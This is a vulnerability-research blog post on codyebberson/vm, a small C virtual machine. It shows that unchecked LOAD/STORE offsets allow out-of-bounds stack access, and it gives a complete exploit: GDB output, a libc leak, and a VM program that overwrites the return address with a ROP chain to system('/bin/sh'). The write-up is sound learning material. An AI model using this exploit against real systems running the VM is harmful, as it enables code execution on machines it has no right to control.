Finding memory bugs in random github projects Num. 1: codyebberson/vm
Recently I’ve become a bit fed up with CTFs and wanted to test my skills on real targets. I tried finding bugs in popular software such as FileZilla, but I hit a wall every single time. Instead of directly targeting software that has been pentested thousands of times, I’ve decided to experiment on smaller projects with less visibility. This series of posts will essentially be me trying to find memory corruption bugs in GitHub projects and then trying to exploit them to spawn a shell (which is usually not trivial).
To kick things off, I’ve chosen a small project with only a few stars (46 at the moment) and no updates in the past decade.
The Target
The repository is https://github.com/codyebberson/vm, described as “A simple VM in C Based on Terence Parr’s simple-virtual-machine https://github.com/parrt/simple-virtual-machine”.
It’s an easy target because the codebase is rather small, I have quite some experience with microarchitecture, and it’s quite easy to mess up the code of a VM lol.
Presentation of the Virtual Machine
The code fits in a single vm.c file and primarily operates within the vm_exec function.
The VM only has 3 registers:
- ip (the instruction pointer, i.e. the program counter)
- fp
- sp
And a stack of 8000 bytes.
Here’s a glimpse into its code:
int ip = 0; // instruction pointer register
int sp = -1; // stack pointer register
int fp = -1; // frame pointer register
int stack[DEFAULT_STACK_SIZE];
The code the VM executes is stored in an array of integers called code, which is supplied by the user.
It has 15 instructions in total:
- 3 arithmetic instructions: IADD, ISUB, IMUL
- 2 comparison instructions: ILT, IEQ
- 3 jump instructions: BR, BRT, BRF
- 6 memory instructions: ICONST, POP, LOAD, STORE, GLOAD, GSTORE
- and finally, one syscall: PRINT (which prints a 4-byte integer)
(I won’t cover every instruction; if you want more details, the implementations are here: https://github.com/codyebberson/vm/blob/5f05c8bd1abe77fb322e45541d76e29d07f94a25/vm.c#L64)
The operands of an instruction go right after its opcode in the code array. Since code is an array of int, each operand is a 4-byte integer.
As an example, the ICONST instruction, which pushes an integer onto the stack, works this way:
case ICONST:
    stack[++sp] = code[ip++]; // push operand
    break;
In pseudocode, that gives something like this:
sp = sp + 1
stack[sp] = code[ip]
ip = ip + 1
So basically, it increments the stack pointer, reads the operand from code (the program you gave to the VM) at the index held in the instruction pointer, stores it in the new top-of-stack slot, and then moves the instruction pointer past the operand.
VMs often falter with load and store instructions by neglecting bounds checking (you can read this paper on the security issues of virtualization). Despite the stack’s limit of 8000 bytes, the offset operand is a full int taken straight from the code array, so it can point far outside the stack, in either direction.
Let’s check the implementation of those two instructions:
case LOAD:
    offset = code[ip++];
    stack[++sp] = stack[fp+offset];
    break;

case STORE:
    offset = code[ip++];
    stack[fp+offset] = stack[sp--];
    break;
It didn’t miss… Nothing restricts the value of offset in these instructions, so they allow out-of-bounds reads and writes relative to the stack array.
The binary has every protection enabled (NX/PIE/Full RELRO), so in order to do interesting things such as spawning a shell, we must first leak an address.
The binary itself contains very few gadgets, if any. Consequently, we must use the libc, which is a bummer because it means the exploit will depend on your libc version. It’s still possible to make the exploit work if you don’t know the version: leak a known symbol, then use https://libc.blukat.me to identify the libc you are working with.
Personally, I will be working with GLIBC 2.35-0ubuntu3.8.
Let’s compile and debug the binary to see what we are working with under the hood.
Compiling
To test the VM, the maintainer provides a vmtest.c file as an example program. I trimmed it down so it wouldn’t be too long, and because I only want to look at the LOAD and STORE instructions.
#include <stdio.h>
#include "vm.h"

int hello[] = { // the code that will be executed
    LOAD, 1,
    STORE, 1,
    HALT
};

int main(int argc, char *argv[])
{
    vm_exec(hello, sizeof(hello), 0, 0, 0);
    return 0;
}
We can then compile with the following command:
~/PwnSearch/VM/codyVM » make vmtest.exe
gcc -c -O3 -std=c99 [yapping ...] -o vmtest.o vmtest.c
gcc [more yapping ...] -o vmtest.exe vm.o vmtest.o
(the file is named vmtest.exe but it’s an ELF file)
Debugging
I will be using GDB along with pwndbg to debug.
We want to look at the LOAD and STORE instructions, so let’s see what they compile to. To do this, I am going to put a breakpoint on each of them.
Instead of decompiling the binary, and since I am a goat, I’ll compile with the -g flag so I can set breakpoints on specific source lines. I updated the Makefile accordingly:
CC = gcc
CFLAGS = -O3 -std=c99 -pedantic -pedantic-errors -g -fno-exceptions \
	-Wl,-z,relro -Wl,-z,now -fvisibility=hidden -W -Wall \
	-Wno-unused-parameter -Wno-unused-function -Wno-unused-label \
	-Wpointer-arith -Wformat -Wreturn-type -Wsign-compare -Wmultichar \
	-Wformat-nonliteral -Winit-self -Wuninitialized -Wno-deprecated \
	-Wformat-security -Werror -Wformat=2 -Wno-format-nonliteral -Wshadow \
	-Wpointer-arith -Wcast-qual -Wmissing-prototypes -Wno-missing-braces
LINK = gcc
LINKFLAGS = -Wl,-O1 -Wl,--discard-all -Wl,--no-undefined -g

all: vmtest.exe
vmtest.exe: vm.o vmtest.o
	$(LINK) $(LINKFLAGS) -o $@ $^
%.o: %.c
	$(CC) -c $(CFLAGS) -o $@ $<
clean:
	rm -rf *.exe
	rm -rf *.o
We can finally start debugging the binary…
The lines I want to break on are the 103rd and the 111th. To do so, I launched gdb and entered these commands:
$ gdb -q vmtest.exe
Reading symbols from vmtest.exe...
pwndbg> b vm.c:103
Breakpoint 1 at 0x1570: file vm.c, line 104.
pwndbg> b vm.c:111
Breakpoint 2 at 0x1510: file vm.c, line 112.
pwndbg> r
The first breakpoint hit corresponds to the LOAD instruction, responsible for loading data from the stack using the provided offset.
pwndbg> context disasm
──────────────────────────────────────────────────────────────────────────────────────[ DISASM / x86-64 / set emulate on ]───────────────────────────────────────────────────────────────────────────────────────
► 0x555555555570 <vm_exec+944> mov rax, qword ptr [rbp - 0xff0] <vm_exec+944>
0x555555555577 <vm_exec+951> movsxd r9, r14d
0x55555555557a <vm_exec+954> add ebx, 1
0x55555555557d <vm_exec+957> add r12d, 2
0x555555555581 <vm_exec+961> mov eax, dword ptr [rax + r9*4]
0x555555555585 <vm_exec+965> sub eax, 1
0x555555555588 <vm_exec+968> cdqe
0x55555555558a <vm_exec+970> mov edx, dword ptr [rbp + rax*4 - 0xfe0]
0x555555555591 <vm_exec+977> movsxd rax, ebx
0x555555555594 <vm_exec+980> mov dword ptr [rbp + rax*4 - 0xfe0], edx
0x55555555559b <vm_exec+987> jmp vm_exec+288 <vm_exec+288>
─────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
pwndbg> ni 7
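Long story short, mov edx, dword ptr [rbp + rax*4 - 0xfe0] is the instruction that loads the data. At that point the register rax holds fp + offset, the index into the stack array: the sub eax, 1 just before it adds fp (which is -1) to the offset we entered, so with offset 1 the index is 0. Let’s see what data is lying around: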
pwndbg> x/40a $rbp + $rax*4 - 0xfe0
0x7fffffffca60: 0x8 0x46474e550
0x7fffffffca70: 0x1e3e4c 0x1e3e4c
0x7fffffffca80: 0x1e3e4c 0x70d4
0x7fffffffca90: 0x70d4 0x4
0x7fffffffcaa0: 0x66474e551 0x0
0x7fffffffcab0: 0x0 0x0
0x7fffffffcac0: 0x0 0x0
0x7fffffffcad0: 0x10 0x46474e552
0x7fffffffcae0: 0x2158f0 0x2168f0
0x7fffffffcaf0: 0x2168f0 0x3710
0x7fffffffcb00: 0x3710 0x1
0x7fffffffcb10: 0x0 0x7ffff7fcbc83 <_dl_map_object_from_fd+179>
0x7fffffffcb20: 0x4 0x7fffffffc800
0x7fffffffcb30: 0x1000 0x210003
0x7fffffffcb40: 0xffffffff89e 0x7fffffffc800
0x7fffffffcb50: 0x3 0x0
0x7fffffffcb60: 0x0 0x7ffff7ffe118 <_r_debug>
0x7fffffffcb70: 0x7fff00000004 0x1
0x7fffffffcb80: 0x228e50 0x5555555544f5
0x7fffffffcb90: 0x7ffff7fbd140 0x3
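As you can see, there is a library address at 0x7fffffffcb18 (the <_dl_map_object_from_fd+179> entry in the second column of the 0x7fffffffcb10 row). Strictly speaking, _dl_map_object_from_fd lives in the dynamic loader rather than in libc itself, but on my setup it sits at a fixed distance from the libc base, so I’ll treat it as our libc leak. With offset 1 we load from 0x7fffffffca60, so to load 0x7fffffffcb18 we must use the offset (0x7fffffffcb18 - 0x7fffffffca60)/4 + 1 = 47 (we divide by 4 because the VM loads DWORDs).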
Another thing to look for is the distance between 0x7fffffffca60 and the saved return address that vm_exec uses to return into main. I used pwndbg’s retaddr command for this:
pwndbg> retaddr
0x7fffffffda48 —▸ 0x5555555550c0 (main+32) ◂— xor eax, eax
0x7fffffffda58 —▸ 0x7ffff7da4d90 (__libc_start_call_main+128) ◂— mov edi, eax
0x7fffffffdaf8 —▸ 0x7ffff7da4e40 (__libc_start_main+128) ◂— mov r15, qword ptr [rip + 0x1f0159]
0x7fffffffdb48 —▸ 0x5555555550f5 (_start+37) ◂— hlt
The return address is at 0x7fffffffda48 and the base of the VM stack is at 0x7fffffffca60, so it sits at offset (0x7fffffffda48 - 0x7fffffffca60)/4 + 1 = 1019.
It is also worth mentioning that (for my version of the libc) the address we will be leaking is 0x250c83 bytes above the libc base address.
I obtained this figure as follows:
pwndbg> vmmap libc
LEGEND: STACK | HEAP | CODE | DATA | RWX | RODATA
 Start End Perm Size Offset File
 0x7ffff7d7b000 0x7ffff7da3000 r--p 28000 0 /usr/lib/x86_64-linux-gnu/libc.so.6
 0x7ffff7da3000 0x7ffff7f38000 r-xp 195000 28000 /usr/lib/x86_64-linux-gnu/libc.so.6
 0x7ffff7f38000 0x7ffff7f90000 r--p 58000 1bd000 /usr/lib/x86_64-linux-gnu/libc.so.6
 0x7ffff7f90000 0x7ffff7f91000 ---p 1000 215000 /usr/lib/x86_64-linux-gnu/libc.so.6
 0x7ffff7f91000 0x7ffff7f95000 r--p 4000 215000 /usr/lib/x86_64-linux-gnu/libc.so.6
 0x7ffff7f95000 0x7ffff7f97000 rw-p 2000 219000 /usr/lib/x86_64-linux-gnu/libc.so.6
pwndbg> distance 0x7ffff7d7b000 0x7ffff7fcbc83
0x7ffff7d7b000->0x7ffff7fcbc83 is 0x250c83 bytes
We now have every primitive we need to pop our shell.
Spawning a shell
We will now write the program that the VM will run to spawn our shell.
Here is what we need to do:
- Use the LOAD instruction to leak the libc address and subtract 0x250c83 to obtain the libc base.
- Use the STORE instruction to overwrite the saved return address (the one vm_exec uses to return into main) with an arbitrary address.
Here is how I managed to do it:
int program[] = {
    // 1. Overwrite the return address with a bare ret gadget. It is only
    //    there to fix the stack alignment issue __libc_system would hit.
    LOAD, 47,           // low part of the libc address
    ICONST, 2428035,    // push 2428035 (0x250c83) so we can subtract it
    ISUB,               // low part of the libc base
    ICONST, 0x029139,
    IADD,               // the ret gadget is 0x029139 above the libc base
    LOAD, 48,           // high part of the libc address
    STORE, 1020,        // high part of the return address
    STORE, 1019,        // low part of the return address

    // 2. Put pop rdi ; ret
    // same as above, but this time we add 0x02a3e5 to reach a pop rdi ; ret gadget in the libc
    LOAD, 47,
    ICONST, 2428035,
    ISUB,
    ICONST, 0x02a3e5,
    IADD,
    LOAD, 48,
    STORE, 1022,
    STORE, 1021,

    // 3. Put /bin/sh
    // same as above, but this time we add 1934968 to reach the address of /bin/sh in the libc
    LOAD, 47,
    ICONST, 2428035,
    ISUB,
    ICONST, 1934968,
    IADD,
    LOAD, 48,
    STORE, 1024,
    STORE, 1023,

    // 4. Put __libc_system
    // same as above, but this time we add 331120 to reach the address of __libc_system in the libc
    LOAD, 47,
    ICONST, 2428035,
    ISUB,
    ICONST, 331120,
    IADD,
    LOAD, 48,
    STORE, 1026,
    STORE, 1025,

    HALT // make vm_exec return and jump to our modified return address
};
Which gives us the following vmtest.c:
#include <stdio.h>
#include "vm.h"

int program[] = {
    [...]
};

int main(int argc, char *argv[])
{
    vm_exec(program, sizeof(program), 0, 0, 0);
    return 0;
}
We can now compile with make all.
And now for the moment you’ve all been waiting for:
~/PwnSearch/VM/codyVM » ./vmtest.exe
$ ls
LICENSE Makefile README.md vm.c vm.h vm.o vmtest.c vmtest.exe vmtest.o
$ id
uid=1000(number) gid=1000(number) groups=1000(number)
Conclusion
This initial exploration of codyebberson/vm has provided a small insight into real-world vulnerabilities within smaller GitHub projects. Stay tuned for more episodes as I continue to uncover and exploit memory bugs in various repositories.
chopin ftw